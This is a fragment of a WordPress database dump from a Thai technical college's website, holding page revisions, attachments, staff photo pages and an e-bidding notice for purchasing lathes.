(2889, 3, '2018-06-01 13:46:54', '2018-06-01 06:46:54', '<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n<h3><a href=\"https://drive.google.com/file/d/0B7ghyAKLnNIXSWRFUVVoQUZJSFk/view\"><span style=\"color: #0000ff;\">โลโก้วิทยาลัยฯ</span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน.pdf\">คู่มือการประเมินสถานศึกษาอาชีวศึกษา เพื่อรับรางวัลพระราชทาน</a></h3>\r\n<h3><strong><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%84%E0%B8%A7%E0%B8%B2%E0%B8%A1%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%AA%E0%B8%96%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B9%82%E0%B8%94%E0%B8%A2%E0%B8%95%E0%B9%89%E0%B8%99%20%E0%B8%9C%E0%B8%AD_%E0%B8%AA%E0%B8%B4%E0%B8%A3%E0%B8%B4%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B9%8C.ppt\">ความรู้ด้านการประกันคุณภาพ</a></strong></h3>\r\n<h3><strong><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%9D%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%20%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B1%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B9%80%E0%B8%81%E0%B9%87%E0%B8%9A%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD.zip\">แบบฟอร์มเครื่องมือที่ใช้เก็บรวบรวมข้อมูล</a></strong></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"/รายงานการประเมินตนเอง-sar\">รายงานการประเมินตนเอง (SAR)</a> </span></h3>\r\n<h3><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #0000ff;\"><strong>ข้อมูลนักเรียน นักศึกษา</strong></span></a></h3>\r\n \r\n\r\n ', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'inherit', 'closed', 'closed', '', '1753-revision-v1', '', '', '2018-06-01 13:46:54', '2018-06-01 06:46:54', '', 1753, 'http://www.technicrayong.ac.th/1753-revision-v1/', 0, 'revision', '', 0),
(2890, 3, '2018-11-21 10:11:00', '2018-11-21 03:11:00', '<img class=\"aligncenter size-full wp-image-1619\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" />\n\n<img class=\"aligncenter wp-image-1496 \" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\n\n \n<h3><span style=\"color: #993300;\">** ข้อมูลนักเรียน นักศึกษา </span> <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\n<h3><span style=\"color: #993300;\">** รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา </span><a href=\"/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%B1%E0%B8%A1%E0%B8%A4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\n ', 'งานทะเบียน', '', 'inherit', 'closed', 'closed', '', '1576-autosave-v1', '', '', '2018-11-21 10:11:00', '2018-11-21 03:11:00', '', 1576, 'http://www.technicrayong.ac.th/1576-autosave-v1/', 0, 'revision', '', 0),
(2891, 3, '2018-06-01 13:47:54', '2018-06-01 06:47:54', '<img class=\"aligncenter size-full wp-image-1619\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496 \" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n<h3><span style=\"color: #993300;\">** ข้อมูลนักเรียน นักศึกษา </span> <a href=\"http://www.technicrayong.ac.th/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานทะเบียน', '', 'inherit', 'closed', 'closed', '', '1576-revision-v1', '', '', '2018-06-01 13:47:54', '2018-06-01 06:47:54', '', 1576, 'http://www.technicrayong.ac.th/1576-revision-v1/', 0, 'revision', '', 0),
(2892, 3, '2018-06-01 13:49:10', '2018-06-01 06:49:10', '<img class=\"aligncenter size-full wp-image-1619\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496 \" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n<h3><span style=\"color: #993300;\">** ข้อมูลนักเรียน นักศึกษา </span> <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n<h3><span style=\"color: #993300;\">** รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา </span><a href=\"http://www.technicrayong.ac.th/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%B1%E0%B8%A1%E0%B8%A4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานทะเบียน', '', 'inherit', 'closed', 'closed', '', '1576-revision-v1', '', '', '2018-06-01 13:49:10', '2018-06-01 06:49:10', '', 1576, 'http://www.technicrayong.ac.th/1576-revision-v1/', 0, 'revision', '', 0),
(2894, 3, '2018-06-01 13:50:56', '2018-06-01 06:50:56', '<img class=\"aligncenter size-full wp-image-2799\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n ', 'งานศูนย์ข้อมูลสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-06-01 13:50:56', '2018-06-01 06:50:56', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(2895, 3, '2018-06-01 13:58:01', '2018-06-01 06:58:01', '<img class=\"aligncenter size-full wp-image-2799\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n<h3><a href=\"http://www.technicrayong.ac.th/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B260/\"><span style=\"color: #ff6600;\">ข้อมูลนักเรียน นักศึกษา</span></a></h3>\r\n<h3><span style=\"color: #ff6600;\">ข้อมูลบุคลากร</span></h3>\r\n<h3><span style=\"color: #ff6600;\">แบบฟอร์มขอใช้ INTERNET (สำหรับบุคลากรทางการศึกษา)</span></h3>\r\n \r\n\r\n ', 'งานศูนย์ข้อมูลสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-06-01 13:58:01', '2018-06-01 06:58:01', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(2896, 3, '2018-06-01 14:06:16', '2018-06-01 07:06:16', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1XZFoP9L7lisH5J-j0xdwgT0Pg7nyNmu3\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาเครื่องมือวัดและควบคุม', '', 'inherit', 'closed', 'closed', '', '2238-autosave-v1', '', '', '2018-06-01 14:06:16', '2018-06-01 07:06:16', '', 2238, 'http://www.technicrayong.ac.th/2238-autosave-v1/', 0, 'revision', '', 0),
(2897, 3, '2018-06-01 14:37:53', '2018-06-01 07:37:53', '', '1-6-2561 14-33-36', '', 'inherit', 'closed', 'closed', '', '1-6-2561-14-33-36', '', '', '2018-06-01 14:37:53', '2018-06-01 07:37:53', '', 2883, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/1-6-2561-14-33-36.jpg', 0, 'attachment', 'image/jpeg', 0),
(2898, 3, '2018-06-01 14:37:55', '2018-06-01 07:37:55', '', '1-6-2561 14-39-39', '', 'inherit', 'closed', 'closed', '', '1-6-2561-14-39-39', '', '', '2018-06-01 14:37:55', '2018-06-01 07:37:55', '', 2883, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/1-6-2561-14-39-39.jpg', 0, 'attachment', 'image/jpeg', 0),
(2899, 3, '2018-06-01 14:38:17', '2018-06-01 07:38:17', '', '1-6-2561 14-40-28', '', 'inherit', 'closed', 'closed', '', '1-6-2561-14-40-28', '', '', '2018-06-01 14:38:17', '2018-06-01 07:38:17', '', 2883, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/1-6-2561-14-40-28.jpg', 0, 'attachment', 'image/jpeg', 0),
(2900, 3, '2018-06-01 14:39:11', '2018-06-01 07:39:11', '<img class=\"aligncenter wp-image-2897 size-full\" src=\"/wp-content/uploads/2018/06/1-6-2561-14-33-36.jpg\" alt=\"\" width=\"193\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-2898\" src=\"/wp-content/uploads/2018/06/1-6-2561-14-39-39.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-2899 size-full\" src=\"/wp-content/uploads/2018/06/1-6-2561-14-40-28.jpg\" alt=\"\" width=\"582\" height=\"335\" />', 'เครื่องมือวัดและควบคุม', '', 'inherit', 'closed', 'closed', '', '2883-revision-v1', '', '', '2018-06-01 14:39:11', '2018-06-01 07:39:11', '', 2883, 'http://www.technicrayong.ac.th/2883-revision-v1/', 0, 'revision', '', 0),
(2903, 3, '2018-06-01 15:25:28', '2018-06-01 08:25:28', '', 'ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ภาค', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%ad%e0%b8%9a%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b1%e0%b8%81', '', '', '2018-06-01 15:25:28', '2018-06-01 08:25:28', '', 2642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม-ภาค.pdf', 0, 'attachment', 'application/pdf', 0),
(2904, 3, '2018-06-01 15:25:35', '2018-06-01 08:25:35', '', 'ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%ad%e0%b8%9a%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b1%e0%b8%81-2', '', '', '2018-06-01 15:25:35', '2018-06-01 08:25:35', '', 2642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf', 0, 'attachment', 'application/pdf', 0),
(2905, 3, '2018-06-01 15:25:42', '2018-06-01 08:25:42', '', 'ทักษะชาตื', '', 'inherit', 'closed', 'closed', '', '%e0%b8%97%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%95%e0%b8%b7', '', '', '2018-06-01 15:25:42', '2018-06-01 08:25:42', '', 2642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ทักษะชาตื.pdf', 0, 'attachment', 'application/pdf', 0),
(2906, 3, '2018-06-01 15:36:03', '2018-06-01 08:36:03', '<img class=\"aligncenter wp-image-2643 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-2644\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-05-300x80.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-2645 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-23.jpg\" alt=\"\" width=\"477\" height=\"344\" />\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ทักษะชาตื.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ทักษะพื้นฐาน ระดับชาติ ครั้งที่ ๒๗</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม </a><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\"> ทักษะพื้นฐาน ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ </a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม-ภาค.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ระดับอาชีวศึกษาจังหวัดระยอง</a></span></h4>\r\nhttps://www.youtube.com/watch?v=c9S7zZwl-iI&feature=youtu.be\r\n\r\nhttps://www.youtube.com/watch?v=QHMev_L-eOA&feature=youtu.be\r\n\r\n \r\n\r\n \r\n\r\n ', 'การโรงแรม', '', 'inherit', 'closed', 'closed', '', '2642-revision-v1', '', '', '2018-06-01 15:36:03', '2018-06-01 08:36:03', '', 2642, 'http://www.technicrayong.ac.th/2642-revision-v1/', 0, 'revision', '', 0),
(2908, 3, '2018-06-01 16:11:40', '2018-06-01 09:11:40', '', '6-2-2561 9-55-14', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-55-14', '', '', '2018-06-01 16:11:40', '2018-06-01 09:11:40', '', 645, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/6-2-2561-9-55-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(2909, 3, '2018-06-01 16:12:17', '2018-06-01 09:12:17', '<img class=\"aligncenter size-full wp-image-2908\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-55-14.jpg\" alt=\"\" width=\"154\" height=\"197\" />\r\n<h3 style=\"text-align: center;\">นางณัฐธารีย์ สิริกุลปัญญาพร\r\nรองผู้อำนวยการฝ่ายวิชาการ</h3>', 'รองผู้อำนวยการฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '645-revision-v1', '', '', '2018-06-01 16:12:17', '2018-06-01 09:12:17', '', 645, 'http://www.technicrayong.ac.th/645-revision-v1/', 0, 'revision', '', 0),
(2910, 3, '2018-06-01 16:14:11', '2018-06-01 09:14:11', '<img class=\"aligncenter wp-image-2908\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-55-14.jpg\" alt=\"\" width=\"250\" height=\"320\" />\r\n<h3 style=\"text-align: center;\">นางณัฐธารีย์ สิริกุลปัญญาพร\r\nรองผู้อำนวยการฝ่ายวิชาการ</h3>', 'รองผู้อำนวยการฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '645-revision-v1', '', '', '2018-06-01 16:14:11', '2018-06-01 09:14:11', '', 645, 'http://www.technicrayong.ac.th/645-revision-v1/', 0, 'revision', '', 0),
(2912, 3, '2018-06-01 16:14:52', '2018-06-01 09:14:52', '', '6-2-2561 9-56-17', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-56-17', '', '', '2018-06-01 16:14:52', '2018-06-01 09:14:52', '', 649, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/6-2-2561-9-56-17.jpg', 0, 'attachment', 'image/jpeg', 0),
(2913, 3, '2018-06-01 16:15:32', '2018-06-01 09:15:32', '<img class=\"aligncenter wp-image-2912\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-56-17.jpg\" alt=\"\" width=\"250\" height=\"332\" />\r\n<h3 style=\"text-align: center;\">นายกิตติพงค์ อุตตมะเวทิน\r\nรองผู้อำนวยการฝ่ายบริหารทรัพยากร</h3>', 'รองผู้อำนวยการฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '649-revision-v1', '', '', '2018-06-01 16:15:32', '2018-06-01 09:15:32', '', 649, 'http://www.technicrayong.ac.th/649-revision-v1/', 0, 'revision', '', 0),
(2914, 3, '2018-06-01 16:17:29', '2018-06-01 09:17:29', '', 'นายยุทธนา อ่อนส้มกฤษ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%a2%e0%b8%b8%e0%b8%97%e0%b8%98%e0%b8%99%e0%b8%b2-%e0%b8%ad%e0%b9%88%e0%b8%ad%e0%b8%99%e0%b8%aa%e0%b9%89%e0%b8%a1%e0%b8%81%e0%b8%a4%e0%b8%a9-2', '', '', '2018-06-01 16:17:29', '2018-06-01 09:17:29', '', 647, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/นายยุทธนา-อ่อนส้มกฤษ-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(2916, 1, '2018-06-04 17:28:20', '2018-06-04 10:28:20', '<h4><span style=\"color: #0000ff;\">ประกาศนี้มีเอกสาร 3 ฉบับ ดังนี้</span>\r\n----------------------------------------------</h4>\r\n1. <a href=\"/wp-content/uploads/2018/06/ประกาศ-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">ประกาศวิทยาลัยเทคนิคระยอง เรื่องประกวดราคาซื้อครุภัณฑ์เครื่องกลึง ฯ คลิ๊กเพื่อเปิดดู</a>\r\n2. <a href=\"/wp-content/uploads/2018/06/เอกสาร-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding) คลิ๊กเพื่อเปิดดู</a>\r\n3. <a href=\"/wp-content/uploads/2018/06/คุณลักษณะ-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">คุณลักษณะครุภัณฑ์ คลิ๊กเพื่อเปิดดู</a>', 'ประกวดราคาซื้อครุภัณฑ์เครื่องกลึงขนาดยันศูนย์เหนือแท่น 165 มม. พร้อมอุปกรณ์ จำนวน 2 ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84%e0%b8%a3%e0%b8%b8%e0%b8%a0%e0%b8%b1%e0%b8%93%e0%b8%91%e0%b9%8c', '', '', '2018-06-04 17:33:53', '2018-06-04 10:33:53', '', 0, 'http://www.technicrayong.ac.th/?p=2916', 399, 'post', '', 0),
(2917, 1, '2018-06-04 17:23:29', '2018-06-04 10:23:29', '', 'เอกสาร-ประกวดราคา-เครื่องกลึง-2561', '', 'inherit', 'closed', 'closed', '', '%e0%b9%80%e0%b8%ad%e0%b8%81%e0%b8%aa%e0%b8%b2%e0%b8%a3-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2-%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad', '', '', '2018-06-04 17:23:29', '2018-06-04 10:23:29', '', 2916, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/เอกสาร-ประกวดราคา-เครื่องกลึง-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(2918, 1, '2018-06-04 17:23:33', '2018-06-04 10:23:33', '', 'คุณลักษณะ-เครื่องกลึง-2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%93%e0%b8%b0-%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%81%e0%b8%a5%e0%b8%b6%e0%b8%87-2561', '', '', '2018-06-04 17:23:33', '2018-06-04 10:23:33', '', 2916, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/คุณลักษณะ-เครื่องกลึง-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(2919, 1, '2018-06-04 17:23:37', '2018-06-04 10:23:37', '', 'ประกาศ-ประกวดราคา-เครื่องกลึง-2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2-%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad', '', '', '2018-06-04 17:23:37', '2018-06-04 10:23:37', '', 2916, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ประกาศ-ประกวดราคา-เครื่องกลึง-2561.pdf', 0, 'attachment', 'application/pdf', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2920, 1, '2018-06-04 17:28:20', '2018-06-04 10:28:20', '<h4><span style=\"color: #0000ff;\">ประกาศนี้มีเอกสาร 3 ฉบับ ดังนี้</span>\r\n----------------------------------------------\r\n\r\n1. <a href=\"/wp-content/uploads/2018/06/ประกาศ-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">ประกาศวิทยาลัยเทคนิคระยอง เรื่องประกวดราคาซื้อครุภัณฑ์เครื่องกลึง ฯ</a>\r\n2. <a href=\"/wp-content/uploads/2018/06/คุณลักษณะ-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)</a>\r\n3. <a href=\"/wp-content/uploads/2018/06/เอกสาร-ประกวดราคา-เครื่องกลึง-2561.pdf\" target=\"_blank\" rel=\"noopener\">คุณลักษณะครุภัณฑ์</a></h4>', 'ประกวดราคาซื้อครุภัณฑ์เครื่องกลึงขนาดยันศูนย์เหนือแท่น 165 มม. พร้อมอุปกรณ์ จำนวน 2 ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '2916-revision-v1', '', '', '2018-06-04 17:28:20', '2018-06-04 10:28:20', '', 2916, 'http://www.technicrayong.ac.th/2916-revision-v1/', 0, 'revision', '', 0),
